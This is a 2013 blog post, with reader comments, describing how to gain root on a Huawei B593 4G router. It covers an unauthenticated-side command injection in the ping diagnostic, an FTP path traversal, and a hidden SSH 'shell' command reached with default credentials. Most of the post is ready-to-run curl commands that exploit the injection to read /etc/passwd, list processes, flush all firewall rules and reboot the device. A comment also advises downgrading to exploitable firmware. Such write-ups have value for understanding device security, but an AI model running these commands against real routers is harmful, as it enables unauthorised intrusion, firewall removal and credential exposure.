Saturday, August 03, 2013

Gaining root shell on Huawei B593 4G LTE router

Huawei B593 has "few" security issues. If you want to play around here's some tips.

Update 8/2014: If you have recent firmware some of these have been fixed. See Jari's blog for up to date information.

1. Under diagnostics there's "ping" feature that allows execution of commands as root. Web interface has javascript checks but nothing on server side.

2. FTP server feature allows entering ../.. as home directory and thus full read/write access to entire filesystem, not just USB stick that was intended to be shared via FTP.

3. SSH access to "ATP" console has hidden command "shell" that drops you to root shell. Disable iptables via ping exploit and then ssh in to device using "ssh admin@192.168.1.1 -s /bin/sh" with password "admin", type "shell" and that's it.

Rest is just dump of my notes. You should be able to figure out what to do with them.

# Create cookie file for curl, only SessionID_R3 is set via HTTP headers, rest are controlled by javascript
echo -e "192.168.1.1\tFALSE\t/\tFALSE\t0\tFirstMenu\tAdmin_0"      >cookie.txt
echo -e "192.168.1.1\tFALSE\t/\tFALSE\t0\tSecondMenu\tAdmin_0_0"  >>cookie.txt
echo -e "192.168.1.1\tFALSE\t/\tFALSE\t0\tThirdMenu\tAdmin_0_0_0" >>cookie.txt

# Login and save new SessionID_R3 value, password field is your admin password in base64 encoded form
curl -bcookie.txt -ccookie.txt -H"Cookie: SessionID_R3=0; FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0; Language=en" -d"Username=admin&Password=YWRtaW4=" -s "http://192.168.1.1/index/login.cgi"

# Initiate ping
curl -bcookie.txt -ccookie.txt -d"foobar" -s "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|127.0.0.1|-s|32|-c|3||-W|4&RequestFile=/html/management/diagnose.asp"

# Fetch results and do little cleanup
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# cpuinfo
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;cat|/proc/cpuinfo&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# process list
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;ps&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# dump /etc/passwd
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;cat|/etc/passwd&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# busybox components compiled in
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;busybox&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# list of files in /bin
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;ls|-al|bin/&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# active iptables rules
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-L&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# active nat rules
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-L|-t|nat&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# active mangle rules
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-L|-t|mangle&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -s "http://192.168.1.1/html/management/pingresult.asp" | sed -e's/__finshed__.*//g' -e's/\\n/\n/g' | sed -e's/^"//g' -e's/^\ + \"//g'

# flush all iptables rules
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-F&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-X&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-t|nat|-F&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-t|nat|-X&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-t|mangle|-F&RequestFile=/html/management/diagnose.asp"
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;iptables|-t|mangle|-X&RequestFile=/html/management/diagnose.asp"

# reboot device
curl -bcookie.txt -ccookie.txt -d"foobar" "http://192.168.1.1/html/management/excutecmd.cgi?cmd=ping|;reboot&RequestFile=/html/management/diagnose.asp"


8 comments:

  1. Hey. Good read :)

    Can you post the exact command to use with the ping utility to disable iptables? I keep getting errors with that, so I'm thinking this has been patched, or I'm just using the wrong commands.

    Cheers

    ReplyDelete
  2. Hey, as previous user stated .. Good read indeed! :)

    Surprised this worked - or more like - actually was possible to do, to execute root commands on the box this way.

    Anyway, is it possible to remove the forced NAT setting from the Huawei by doing this?
    I have a LTE plan with an external WAN IP, the IP is DHCP but its still a non-ISP-NAT:ed IP.
    So right now i'm able to run what ever services on my computer without any bigger problem.

    What I would like to have is:
    Internet(LTE/4G) => Huawei B593 => Router/Firewall.

    So the WAN ip will be directed directly to my external Router/firewall.
    And have Huawei B593 to work in a bridged mode, only to passthrough the wan ip.

    If thats possible, I'll by you a beer!

    Best Regards
    FF83

    ReplyDelete
  3. If Huawei really patched these, which I find unlikely given their track record on security, just downgrade to exploitable firmware.

    Serving external IP dynamically allocated by ISP to client on LAN side with DHCP is bit tricky. Some devices such as Sierra-Wireless Raven series can do it out of the box. I don't see any reason why one couldn't do same with linux. If you want to try that my Pro Tip is don't do it on embedded platform. Install something like minimal debian on virtual machine with two interfaces. One for WAN and another for LAN. Disable all networking scripts and firewalls from OS init scripts. After you get it working manually start thinking how to do same with Huawei. Otherwise you have way too many moving parts to figure out.

    If configuration using 1:1 NAT is acceptable you simply inject rules to port forward all traffic to your firewall on LAN port. You'll also need to find out how to make custom configuration persist over reboot of Huawei router.

    ReplyDelete
  4. I'm intrigued. What hardware and firmware is that exactly? I'm trying to get acces to a Huawei b593u-12 with a V100R001C748SP104 firmware -- without succes so far.

    ReplyDelete
  5. Hello,

    everything works except ssh-ing to the router. I've got 'subsystem request failed on channel 0' message. Any hints?

    ReplyDelete
  6. Is this also working on this

    Product Information
    Model:
    B593s-22
    SN:
    IMEI:
    Hardware version:
    Ver.B
    Firmware version:
    V200R001B180D20SP30C158
    Firmware build time:
    Aug 14 2013 / 18:11:26

    can you teach on how to gain access on admin my account is only user and it was lock to provider. thank you..

    ReplyDelete
  7. how to set my b59s-22 into bridge mode? or gain access. i try the above but didn't work.

    ReplyDelete
  8. any chance you could post the source of the cgi scripts that you have on your -12 router? i am trying to find a way in on the b593s-22

    ReplyDelete

Got something to say?!